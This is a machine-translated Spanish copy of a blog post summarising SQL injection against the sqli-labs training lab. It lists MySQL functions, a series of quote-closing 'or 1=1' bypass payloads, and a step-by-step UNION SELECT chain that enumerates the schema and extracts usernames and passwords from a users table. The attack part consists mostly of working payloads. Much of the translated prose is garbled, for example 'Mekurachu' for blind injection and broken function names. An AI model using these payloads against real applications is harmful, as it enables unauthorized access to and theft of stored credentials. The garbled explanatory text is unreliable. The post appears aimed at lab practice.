Un resumen muy poco de la inyección de SQL

Others 2020-03-09 15:46:49 views: null

Resumen de inyección SQL sencilla (a)

0x01

(1) inyectados Categoría: ojos del espectador sabia ver sabiduría, no narrado en el presente documento.
(2) las funciones del sistema:

Varias funciones de uso común:

  1. versión () - versión del sistema;
  2. base de datos () - Nombre de base de datos;
  3. usuario) (- nombre de usuario base de datos;
  4. @@ datadir-- camino base de datos;
  5. @@ vision_compile_os-- versión del sistema operativo;
función de concatenación (3) cadena
  1. concat (cadena1, cadena2, ...) - sin condiciones delimitadores están conectados;
  2. CONCAT_WS ( 'separador', str1, str2, ...) - ramal conectado que contiene el delimitador
  3. GROUP_CONCAT (cadena1, cadena2, ...) - Conexiones grupo de todas las cadenas, separados por comas y
    no es necesario un conocimiento detallado de lo que estas tres funciones pueden ser hallazgo desechable de todo el contenido en la línea.
(4) se utiliza generalmente para tratar declaración

o 1 = 1 #
'o 1 = 1 #
'' o 1 = 1 #
) o 1 = 1 #
') o 1 = 1 #
'') o 1 = 1 #
'')) o 1 = 1 #

(5) Las notas

- - + #, / ** / etc.

resumen

De hecho, nada más que una inyección de SQL se divide en dos partes, una cerrada declaraciones de MySQL, y la segunda es la implementación de una nueva frase construida.

0x02 variedad de métodos y procesos de inyección

(1) sqllibs inyección generales (Less1-4)
#注入点
 -1' union select 1,2,3--+
#爆数据库
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where schema_name='security'--+
#爆字段
-1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
-1‘ union select 1,username,password from users where id=2--+

Las siguientes preguntas declaración SQL ejecutadas misma no va a pagar más que decir, sólo diferencias cerrados' en el camino, unidos directamente a ella, puede ser implantado con éxito son:

or 1=1
or 1=1 --+
') or '1'=('1'
) or 1=1 --+
“) or ”1”=(“1
“) or 1=1 --+
(2) Mekurachu

Después de realizar la inyección no hacerse eco de la declaración de portada llamado persianas.

weixin_45645113
Publicado cuatro artículos originales · ganado elogios 0 · Vistas 59
carta privada preocupaciones

Supongo que te gusta

Origin blog.csdn.net/weixin_45645113/article/details/104520544
Recomendado
Clasificación
Diario
Más
2024-04-28(9)
2024-04-27(28)
2024-04-26(22)
2024-04-25(34)
2024-04-24(31)
2024-04-23(29)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)

Code World

© 2018 codetd.com